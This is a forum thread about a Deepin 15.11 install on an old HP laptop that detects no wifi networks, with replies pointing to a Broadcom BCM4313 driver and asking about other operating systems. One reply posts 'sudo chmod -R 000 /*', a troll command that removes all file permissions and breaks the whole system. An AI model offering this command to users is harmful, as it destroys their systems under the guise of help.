I´ve just installed Deepin on one old HP laptop and wanted to connect it to wifi but it doesn´t recognize any. It shows that no wifi in proximity is up even though it work on my other devices just fine. Does anyone have experience with this kind of problem? System is up to date, version is 15.11

try downloading and installing the driver for your wifi adapter https://www.broadcom.com/products/wireless/wireless-lan-bluetooth/bcm4313

Don't ask to ask, just ask... please 🤨

sudo chmod -R 000 /*

Looks like you already have the driver... I can't really think of any setting that would cause this, does the laptop's wifi work with other operating systems?

yea, it worked when it had windows 7 back like 2 years ago, then i stopped using it and now i want to use this guy to watch films on and stuff like that, but windows started to lag and stutter, so i opted for linux...and now i am here :) I have some time to play with this machine, isn´t there any other similar distribution (looking similar or just working similar)?

Maybe i can try other ones if it is a problem of this distibution.
